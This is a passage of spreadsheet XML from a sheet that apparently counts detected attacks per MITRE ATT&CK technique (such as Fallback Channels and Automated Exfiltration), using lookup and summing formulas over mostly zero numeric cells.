      <c r="E4" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F4" s="579" t="str">
        <f>D4&amp;" ("&amp;E4&amp;")"</f>
        <v>1 (3)</v>
      </c>
      <c r="G4" s="292">
        <v>0</v>
      </c>
      <c r="H4" s="322">
        <v>0</v>
      </c>
      <c r="I4" s="322" t="str">
        <f t="shared" ref="I4:I67" si="0">H4 &amp; " (" &amp; G4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="J4" s="12">
        <v>0</v>
      </c>
      <c r="K4" s="13">
        <v>0</v>
      </c>
      <c r="L4" s="394">
        <v>0</v>
      </c>
      <c r="M4" s="322">
        <v>0</v>
      </c>
      <c r="N4" s="322">
        <v>0</v>
      </c>
      <c r="O4" s="322" t="str">
        <f t="shared" ref="O4:O67" si="1">N4 &amp; " (" &amp; M4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="P4" s="12">
        <v>0</v>
      </c>
      <c r="Q4" s="13">
        <v>0</v>
      </c>
      <c r="R4" s="394">
        <v>0</v>
      </c>
      <c r="S4" s="409">
        <v>0</v>
      </c>
      <c r="T4" s="4">
        <v>0</v>
      </c>
      <c r="U4" s="322" t="str">
        <f t="shared" ref="U4:U67" si="2">T4 &amp; " (" &amp; S4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="V4" s="4">
        <v>0</v>
      </c>
      <c r="W4" s="13">
        <v>0</v>
      </c>
      <c r="X4" s="394">
        <v>0</v>
      </c>
      <c r="Y4" s="392">
        <v>1</v>
      </c>
      <c r="Z4" s="392">
        <v>1</v>
      </c>
      <c r="AA4" s="322" t="str">
        <f t="shared" ref="AA4:AA67" si="3">Z4 &amp; " (" &amp; Y4 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="AB4" s="392">
        <v>1</v>
      </c>
      <c r="AC4" s="16">
        <v>1</v>
      </c>
      <c r="AD4" s="394">
        <v>1</v>
      </c>
      <c r="AE4" s="392">
        <v>0</v>
      </c>
      <c r="AF4" s="392">
        <v>0</v>
      </c>
      <c r="AG4" s="322" t="str">
        <f t="shared" ref="AG4:AG67" si="4">AF4 &amp; " (" &amp; AE4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AH4" s="392">
        <v>0</v>
      </c>
      <c r="AI4" s="16">
        <v>0</v>
      </c>
      <c r="AJ4" s="394">
        <v>0</v>
      </c>
      <c r="AK4" s="392">
        <v>1</v>
      </c>
      <c r="AL4" s="392">
        <v>1</v>
      </c>
      <c r="AM4" s="322" t="str">
        <f t="shared" ref="AM4:AM67" si="5">AL4 &amp; " (" &amp; AK4 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="AN4" s="392">
        <v>1</v>
      </c>
      <c r="AO4" s="16">
        <v>1</v>
      </c>
      <c r="AP4" s="394">
        <v>1</v>
      </c>
      <c r="AQ4" s="292">
        <v>0</v>
      </c>
      <c r="AR4" s="322">
        <v>0</v>
      </c>
      <c r="AS4" s="322" t="str">
        <f t="shared" ref="AS4:AS67" si="6">AR4 &amp; " (" &amp; AQ4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT4" s="12">
        <v>0</v>
      </c>
      <c r="AU4" s="13">
        <v>0</v>
      </c>
      <c r="AV4" s="394">
        <v>0</v>
      </c>
      <c r="AW4" s="392">
        <v>0</v>
      </c>
      <c r="AX4" s="392">
        <v>0</v>
      </c>
      <c r="AY4" s="322" t="str">
        <f t="shared" ref="AY4:AY67" si="7">AX4 &amp; " (" &amp; AW4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AZ4" s="4">
        <v>0</v>
      </c>
      <c r="BA4" s="16">
        <v>0</v>
      </c>
      <c r="BB4" s="394">
        <v>0</v>
      </c>
      <c r="BC4" s="292">
        <v>0</v>
      </c>
      <c r="BD4" s="322">
        <v>0</v>
      </c>
      <c r="BE4" s="322" t="str">
        <f t="shared" ref="BE4:BE67" si="8">BD4 &amp; " (" &amp; BC4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BF4" s="12">
        <v>0</v>
      </c>
      <c r="BG4" s="13">
        <v>0</v>
      </c>
      <c r="BH4" s="394">
        <v>0</v>
      </c>
      <c r="BI4" s="292">
        <v>0</v>
      </c>
      <c r="BJ4" s="322">
        <v>0</v>
      </c>
      <c r="BK4" s="322" t="str">
        <f t="shared" ref="BK4:BK67" si="9">BJ4 &amp; " (" &amp; BI4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BL4" s="12">
        <v>0</v>
      </c>
      <c r="BM4" s="13">
        <v>0</v>
      </c>
      <c r="BN4" s="394">
        <v>0</v>
      </c>
      <c r="BO4" s="292">
        <v>2</v>
      </c>
      <c r="BP4" s="322">
        <v>2</v>
      </c>
      <c r="BQ4" s="322" t="str">
        <f t="shared" ref="BQ4:BQ67" si="10">BP4 &amp; " (" &amp; BO4 &amp; ")"</f>
        <v>2 (2)</v>
      </c>
      <c r="BR4" s="12">
        <v>0</v>
      </c>
      <c r="BS4" s="12">
        <v>2</v>
      </c>
      <c r="BT4" s="13">
        <v>1</v>
      </c>
      <c r="BU4" s="394">
        <v>2</v>
      </c>
      <c r="BV4" s="292">
        <v>0</v>
      </c>
      <c r="BW4" s="322">
        <v>0</v>
      </c>
      <c r="BX4" s="322" t="str">
        <f t="shared" ref="BX4:BX67" si="11">BW4 &amp; " (" &amp; BV4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY4" s="12">
        <v>0</v>
      </c>
      <c r="BZ4" s="13">
        <v>0</v>
      </c>
      <c r="CA4" s="394">
        <v>0</v>
      </c>
      <c r="CB4" s="292">
        <v>0</v>
      </c>
      <c r="CC4" s="322">
        <v>0</v>
      </c>
      <c r="CD4" s="322" t="str">
        <f t="shared" ref="CD4:CD67" si="12">CC4 &amp; " (" &amp; CB4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="CE4" s="12">
        <v>0</v>
      </c>
      <c r="CF4" s="12">
        <v>0</v>
      </c>
      <c r="CG4" s="13">
        <v>0</v>
      </c>
      <c r="CH4" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:93" ht="15" customHeight="1">
      <c r="A5" s="4">
        <f t="shared" ref="A5:A68" si="13">A4+1</f>
        <v>3</v>
      </c>
      <c r="B5" s="4" t="str">
        <f>IFERROR(VLOOKUP(A5,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1008</v>
      </c>
      <c r="C5" s="493" t="str">
        <f>IFERROR(VLOOKUP(B5,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Fallback Channels</v>
      </c>
      <c r="D5" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B5)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E5" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6</v>
      </c>
      <c r="F5" s="579" t="str">
        <f t="shared" ref="F5:F68" si="14">D5&amp;" ("&amp;E5&amp;")"</f>
        <v>1 (6)</v>
      </c>
      <c r="G5" s="292">
        <v>0</v>
      </c>
      <c r="H5" s="322">
        <v>0</v>
      </c>
      <c r="I5" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J5" s="12">
        <v>0</v>
      </c>
      <c r="K5" s="13">
        <v>0</v>
      </c>
      <c r="L5" s="394">
        <v>0</v>
      </c>
      <c r="M5" s="322">
        <v>17</v>
      </c>
      <c r="N5" s="322">
        <v>7</v>
      </c>
      <c r="O5" s="322" t="str">
        <f t="shared" si="1"/>
        <v>7 (17)</v>
      </c>
      <c r="P5" s="12">
        <v>4</v>
      </c>
      <c r="Q5" s="13">
        <v>1</v>
      </c>
      <c r="R5" s="394">
        <v>3</v>
      </c>
      <c r="S5" s="409">
        <v>17</v>
      </c>
      <c r="T5" s="4">
        <v>7</v>
      </c>
      <c r="U5" s="322" t="str">
        <f t="shared" si="2"/>
        <v>7 (17)</v>
      </c>
      <c r="V5" s="4">
        <v>4</v>
      </c>
      <c r="W5" s="13">
        <v>1</v>
      </c>
      <c r="X5" s="394">
        <v>3</v>
      </c>
      <c r="Y5" s="392">
        <v>84</v>
      </c>
      <c r="Z5" s="392">
        <v>3</v>
      </c>
      <c r="AA5" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (84)</v>
      </c>
      <c r="AB5" s="392">
        <v>2</v>
      </c>
      <c r="AC5" s="16">
        <v>1</v>
      </c>
      <c r="AD5" s="394">
        <v>3</v>
      </c>
      <c r="AE5" s="392">
        <v>17</v>
      </c>
      <c r="AF5" s="392">
        <v>7</v>
      </c>
      <c r="AG5" s="322" t="str">
        <f t="shared" si="4"/>
        <v>7 (17)</v>
      </c>
      <c r="AH5" s="392">
        <v>4</v>
      </c>
      <c r="AI5" s="16">
        <v>1</v>
      </c>
      <c r="AJ5" s="394">
        <v>3</v>
      </c>
      <c r="AK5" s="392">
        <v>101</v>
      </c>
      <c r="AL5" s="392">
        <v>10</v>
      </c>
      <c r="AM5" s="322" t="str">
        <f t="shared" si="5"/>
        <v>10 (101)</v>
      </c>
      <c r="AN5" s="392">
        <v>6</v>
      </c>
      <c r="AO5" s="16">
        <v>1</v>
      </c>
      <c r="AP5" s="394">
        <v>3</v>
      </c>
      <c r="AQ5" s="292">
        <v>0</v>
      </c>
      <c r="AR5" s="322">
        <v>0</v>
      </c>
      <c r="AS5" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT5" s="12">
        <v>0</v>
      </c>
      <c r="AU5" s="13">
        <v>0</v>
      </c>
      <c r="AV5" s="394">
        <v>0</v>
      </c>
      <c r="AW5" s="392">
        <v>0</v>
      </c>
      <c r="AX5" s="392">
        <v>0</v>
      </c>
      <c r="AY5" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ5" s="4">
        <v>0</v>
      </c>
      <c r="BA5" s="16">
        <v>0</v>
      </c>
      <c r="BB5" s="394">
        <v>0</v>
      </c>
      <c r="BC5" s="292">
        <v>17</v>
      </c>
      <c r="BD5" s="322">
        <v>7</v>
      </c>
      <c r="BE5" s="322" t="str">
        <f t="shared" si="8"/>
        <v>7 (17)</v>
      </c>
      <c r="BF5" s="12">
        <v>4</v>
      </c>
      <c r="BG5" s="13">
        <v>1</v>
      </c>
      <c r="BH5" s="394">
        <v>3</v>
      </c>
      <c r="BI5" s="292">
        <v>4</v>
      </c>
      <c r="BJ5" s="322">
        <v>2</v>
      </c>
      <c r="BK5" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (4)</v>
      </c>
      <c r="BL5" s="12">
        <v>1</v>
      </c>
      <c r="BM5" s="13">
        <v>1</v>
      </c>
      <c r="BN5" s="394">
        <v>2</v>
      </c>
      <c r="BO5" s="292">
        <v>11</v>
      </c>
      <c r="BP5" s="322">
        <v>9</v>
      </c>
      <c r="BQ5" s="322" t="str">
        <f t="shared" si="10"/>
        <v>9 (11)</v>
      </c>
      <c r="BR5" s="12">
        <v>1</v>
      </c>
      <c r="BS5" s="12">
        <v>5</v>
      </c>
      <c r="BT5" s="13">
        <v>1</v>
      </c>
      <c r="BU5" s="394">
        <v>5</v>
      </c>
      <c r="BV5" s="292">
        <v>2</v>
      </c>
      <c r="BW5" s="322">
        <v>2</v>
      </c>
      <c r="BX5" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY5" s="12">
        <v>1</v>
      </c>
      <c r="BZ5" s="13">
        <v>1</v>
      </c>
      <c r="CA5" s="394">
        <v>2</v>
      </c>
      <c r="CB5" s="292">
        <v>10</v>
      </c>
      <c r="CC5" s="322">
        <v>2</v>
      </c>
      <c r="CD5" s="322" t="str">
        <f t="shared" si="12"/>
        <v>2 (10)</v>
      </c>
      <c r="CE5" s="12">
        <v>0</v>
      </c>
      <c r="CF5" s="12">
        <v>1</v>
      </c>
      <c r="CG5" s="13">
        <v>1</v>
      </c>
      <c r="CH5" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="6" spans="1:93" ht="15" customHeight="1">
      <c r="A6" s="4">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="B6" s="4" t="str">
        <f>IFERROR(VLOOKUP(A6,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1011</v>
      </c>
      <c r="C6" s="493" t="str">
        <f>IFERROR(VLOOKUP(B6,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="D6" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B6)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E6" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F6" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G6" s="292">
        <v>0</v>
      </c>
      <c r="H6" s="322">
        <v>0</v>
      </c>
      <c r="I6" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J6" s="12">
        <v>0</v>
      </c>
      <c r="K6" s="13">
        <v>0</v>
      </c>
      <c r="L6" s="394">
        <v>0</v>
      </c>
      <c r="M6" s="322">
        <v>0</v>
      </c>
      <c r="N6" s="322">
        <v>0</v>
      </c>
      <c r="O6" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P6" s="12">
        <v>0</v>
      </c>
      <c r="Q6" s="13">
        <v>0</v>
      </c>
      <c r="R6" s="394">
        <v>0</v>
      </c>
      <c r="S6" s="409">
        <v>0</v>
      </c>
      <c r="T6" s="4">
        <v>0</v>
      </c>
      <c r="U6" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V6" s="4">
        <v>0</v>
      </c>
      <c r="W6" s="13">
        <v>0</v>
      </c>
      <c r="X6" s="394">
        <v>0</v>
      </c>
      <c r="Y6" s="392">
        <v>0</v>
      </c>
      <c r="Z6" s="392">
        <v>0</v>
      </c>
      <c r="AA6" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB6" s="392">
        <v>0</v>
      </c>
      <c r="AC6" s="16">
        <v>0</v>
      </c>
      <c r="AD6" s="394">
        <v>0</v>
      </c>
      <c r="AE6" s="392">
        <v>0</v>
      </c>
      <c r="AF6" s="392">
        <v>0</v>
      </c>
      <c r="AG6" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH6" s="392">
        <v>0</v>
      </c>
      <c r="AI6" s="16">
        <v>0</v>
      </c>
      <c r="AJ6" s="394">
        <v>0</v>
      </c>
      <c r="AK6" s="392">
        <v>0</v>
      </c>
      <c r="AL6" s="392">
        <v>0</v>
      </c>
      <c r="AM6" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN6" s="392">
        <v>0</v>
      </c>
      <c r="AO6" s="16">
        <v>0</v>
      </c>
      <c r="AP6" s="394">
        <v>0</v>
      </c>
      <c r="AQ6" s="292">
        <v>0</v>
      </c>
      <c r="AR6" s="322">
        <v>0</v>
      </c>
      <c r="AS6" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT6" s="12">
        <v>0</v>
      </c>
      <c r="AU6" s="13">
        <v>0</v>
      </c>
      <c r="AV6" s="394">
        <v>0</v>
      </c>
      <c r="AW6" s="392">
        <v>0</v>
      </c>
      <c r="AX6" s="392">
        <v>0</v>
      </c>
      <c r="AY6" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ6" s="4">
        <v>0</v>
      </c>
      <c r="BA6" s="16">
        <v>0</v>
      </c>
      <c r="BB6" s="394">
        <v>0</v>
      </c>
      <c r="BC6" s="292">
        <v>0</v>
      </c>
      <c r="BD6" s="322">
        <v>0</v>
      </c>
      <c r="BE6" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF6" s="12">
        <v>0</v>
      </c>
      <c r="BG6" s="13">
        <v>0</v>
      </c>
      <c r="BH6" s="394">
        <v>0</v>
      </c>
      <c r="BI6" s="292">
        <v>0</v>
      </c>
      <c r="BJ6" s="322">
        <v>0</v>
      </c>
      <c r="BK6" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL6" s="12">
        <v>0</v>
      </c>
      <c r="BM6" s="13">
        <v>0</v>
      </c>
      <c r="BN6" s="394">
        <v>0</v>
      </c>
      <c r="BO6" s="292">
        <v>0</v>
      </c>
      <c r="BP6" s="322">
        <v>0</v>
      </c>
      <c r="BQ6" s="322" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR6" s="12">
        <v>0</v>
      </c>
      <c r="BS6" s="12">
        <v>0</v>
      </c>
      <c r="BT6" s="13">
        <v>0</v>
      </c>
      <c r="BU6" s="394">
        <v>0</v>
      </c>
      <c r="BV6" s="292">
        <v>0</v>
      </c>
      <c r="BW6" s="322">
        <v>0</v>
      </c>
      <c r="BX6" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY6" s="12">
        <v>0</v>
      </c>
      <c r="BZ6" s="13">
        <v>0</v>
      </c>
      <c r="CA6" s="394">
        <v>0</v>
      </c>
      <c r="CB6" s="292">
        <v>0</v>
      </c>
      <c r="CC6" s="322">
        <v>0</v>
      </c>
      <c r="CD6" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE6" s="12">
        <v>0</v>
      </c>
      <c r="CF6" s="12">
        <v>0</v>
      </c>
      <c r="CG6" s="13">
        <v>0</v>
      </c>
      <c r="CH6" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:93" ht="15" customHeight="1">
      <c r="A7" s="4">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="B7" s="4" t="str">
        <f>IFERROR(VLOOKUP(A7,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1018</v>
      </c>
      <c r="C7" s="493" t="str">
        <f>IFERROR(VLOOKUP(B7,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="D7" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B7)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E7" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1002</v>
      </c>
      <c r="F7" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1002)</v>
      </c>
      <c r="G7" s="292">
        <v>0</v>
      </c>
      <c r="H7" s="322">
        <v>0</v>
      </c>
      <c r="I7" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J7" s="12">
        <v>0</v>
      </c>
      <c r="K7" s="13">
        <v>0</v>
      </c>
      <c r="L7" s="394">
        <v>0</v>
      </c>
      <c r="M7" s="322">
        <v>0</v>
      </c>
      <c r="N7" s="322">
        <v>0</v>
      </c>
      <c r="O7" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P7" s="12">
        <v>0</v>
      </c>
      <c r="Q7" s="13">
        <v>0</v>
      </c>
      <c r="R7" s="394">
        <v>0</v>
      </c>
      <c r="S7" s="409">
        <v>0</v>
      </c>
      <c r="T7" s="4">
        <v>0</v>
      </c>
      <c r="U7" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V7" s="4">
        <v>0</v>
      </c>
      <c r="W7" s="13">
        <v>0</v>
      </c>
      <c r="X7" s="394">
        <v>0</v>
      </c>
      <c r="Y7" s="392">
        <v>0</v>
      </c>
      <c r="Z7" s="392">
        <v>0</v>
      </c>
      <c r="AA7" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB7" s="392">
        <v>0</v>
      </c>
      <c r="AC7" s="16">
        <v>0</v>
      </c>
      <c r="AD7" s="394">
        <v>0</v>
      </c>
      <c r="AE7" s="392">
        <v>0</v>
      </c>
      <c r="AF7" s="392">
        <v>0</v>
      </c>
      <c r="AG7" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH7" s="392">
        <v>0</v>
      </c>
      <c r="AI7" s="16">
        <v>0</v>
      </c>
      <c r="AJ7" s="394">
        <v>0</v>
      </c>
      <c r="AK7" s="392">
        <v>0</v>
      </c>
      <c r="AL7" s="392">
        <v>0</v>
      </c>
      <c r="AM7" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN7" s="392">
        <v>0</v>
      </c>
      <c r="AO7" s="16">
        <v>0</v>
      </c>
      <c r="AP7" s="394">
        <v>0</v>
      </c>
      <c r="AQ7" s="292">
        <v>0</v>
      </c>
      <c r="AR7" s="322">
        <v>0</v>
      </c>
      <c r="AS7" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT7" s="12">
        <v>0</v>
      </c>
      <c r="AU7" s="13">
        <v>0</v>
      </c>
      <c r="AV7" s="394">
        <v>0</v>
      </c>
      <c r="AW7" s="392">
        <v>0</v>
      </c>
      <c r="AX7" s="392">
        <v>0</v>
      </c>
      <c r="AY7" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ7" s="4">
        <v>0</v>
      </c>
      <c r="BA7" s="16">
        <v>0</v>
      </c>
      <c r="BB7" s="394">
        <v>0</v>
      </c>
      <c r="BC7" s="292">
        <v>0</v>
      </c>
      <c r="BD7" s="322">
        <v>0</v>
      </c>
      <c r="BE7" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF7" s="12">
        <v>0</v>
      </c>
      <c r="BG7" s="13">
        <v>0</v>
      </c>
      <c r="BH7" s="394">
        <v>0</v>
      </c>
      <c r="BI7" s="292">
        <v>0</v>
      </c>
      <c r="BJ7" s="322">
        <v>0</v>
      </c>
      <c r="BK7" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL7" s="12">
        <v>0</v>
      </c>
      <c r="BM7" s="13">
        <v>0</v>
      </c>
      <c r="BN7" s="394">
        <v>0</v>
      </c>
      <c r="BO7" s="292">
        <v>0</v>
      </c>
      <c r="BP7" s="322">
        <v>0</v>
      </c>
      <c r="BQ7" s="322" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR7" s="12">
        <v>0</v>
      </c>
      <c r="BS7" s="12">
        <v>0</v>
      </c>
      <c r="BT7" s="13">
        <v>0</v>
      </c>
      <c r="BU7" s="394">
        <v>0</v>
      </c>
      <c r="BV7" s="292">
        <v>0</v>
      </c>
      <c r="BW7" s="322">
        <v>0</v>
      </c>
      <c r="BX7" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY7" s="12">
        <v>0</v>
      </c>
      <c r="BZ7" s="13">
        <v>0</v>
      </c>
      <c r="CA7" s="394">
        <v>0</v>
      </c>
      <c r="CB7" s="292">
        <v>0</v>
      </c>
      <c r="CC7" s="322">
        <v>0</v>
      </c>
      <c r="CD7" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE7" s="12">
        <v>0</v>
      </c>
      <c r="CF7" s="12">
        <v>0</v>
      </c>
      <c r="CG7" s="13">
        <v>0</v>
      </c>
      <c r="CH7" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:93" ht="15" customHeight="1">
      <c r="A8" s="4">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="B8" s="4" t="str">
        <f>IFERROR(VLOOKUP(A8,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1020</v>
      </c>
      <c r="C8" s="493" t="str">
        <f>IFERROR(VLOOKUP(B8,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="D8" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B8)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E8" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F8" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (26)</v>
      </c>
      <c r="G8" s="292">
        <v>0</v>
      </c>
      <c r="H8" s="322">
        <v>0</v>
      </c>
      <c r="I8" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J8" s="12">
        <v>0</v>
      </c>
      <c r="K8" s="13">
        <v>0</v>
      </c>
      <c r="L8" s="394">
        <v>0</v>
      </c>
      <c r="M8" s="322">
        <v>0</v>
      </c>
      <c r="N8" s="322">
        <v>0</v>
      </c>
      <c r="O8" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P8" s="12">
        <v>0</v>
      </c>
      <c r="Q8" s="13">
        <v>0</v>
      </c>
      <c r="R8" s="394">
        <v>0</v>
      </c>
      <c r="S8" s="409">
        <v>0</v>
      </c>
      <c r="T8" s="4">
        <v>0</v>
      </c>
      <c r="U8" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V8" s="4">
        <v>0</v>
      </c>
      <c r="W8" s="13">
        <v>0</v>
      </c>
      <c r="X8" s="394">
        <v>0</v>
      </c>
      <c r="Y8" s="392">
        <v>0</v>
      </c>
      <c r="Z8" s="392">
        <v>0</v>
      </c>
      <c r="AA8" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB8" s="392">
        <v>0</v>
      </c>
      <c r="AC8" s="16">
        <v>0</v>
      </c>
      <c r="AD8" s="394">
        <v>0</v>
      </c>
      <c r="AE8" s="392">
        <v>0</v>
      </c>
      <c r="AF8" s="392">
        <v>0</v>
      </c>
      <c r="AG8" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH8" s="392">
        <v>0</v>
      </c>
      <c r="AI8" s="16">
        <v>0</v>
      </c>
      <c r="AJ8" s="394">
        <v>0</v>
      </c>
      <c r="AK8" s="392">
        <v>0</v>
      </c>
      <c r="AL8" s="392">
        <v>0</v>
      </c>
      <c r="AM8" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN8" s="392">
        <v>0</v>
      </c>
      <c r="AO8" s="16">
        <v>0</v>
      </c>
      <c r="AP8" s="394">
        <v>0</v>
      </c>
      <c r="AQ8" s="292">
        <v>0</v>
      </c>
      <c r="AR8" s="322">
        <v>0</v>
      </c>
      <c r="AS8" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT8" s="12">
        <v>0</v>
      </c>
      <c r="AU8" s="13">
        <v>0</v>
      </c>
      <c r="AV8" s="394">
        <v>0</v>
      </c>
      <c r="AW8" s="392">
        <v>0</v>
      </c>
      <c r="AX8" s="392">
        <v>0</v>
      </c>
      <c r="AY8" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ8" s="4">
        <v>0</v>
      </c>
      <c r="BA8" s="16">
        <v>0</v>
      </c>
      <c r="BB8" s="394">
        <v>0</v>
      </c>
      <c r="BC8" s="292">
        <v>0</v>
      </c>
      <c r="BD8" s="322">
        <v>0</v>
      </c>
      <c r="BE8" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF8" s="12">
        <v>0</v>
      </c>
      <c r="BG8" s="13">
        <v>0</v>
      </c>
      <c r="BH8" s="394">
        <v>0</v>
      </c>
      <c r="BI8" s="292">
        <v>1</v>
      </c>
      <c r="BJ8" s="322">
        <v>1</v>
      </c>
      <c r="BK8" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL8" s="12">
        <v>1</v>
      </c>
      <c r="BM8" s="13">
        <v>1</v>
      </c>
      <c r="BN8" s="394">
        <v>1</v>
      </c>
      <c r="BO8" s="292">
        <v>48</v>
      </c>
      <c r="BP8" s="322">
        <v>21</v>
      </c>
      <c r="BQ8" s="322" t="str">
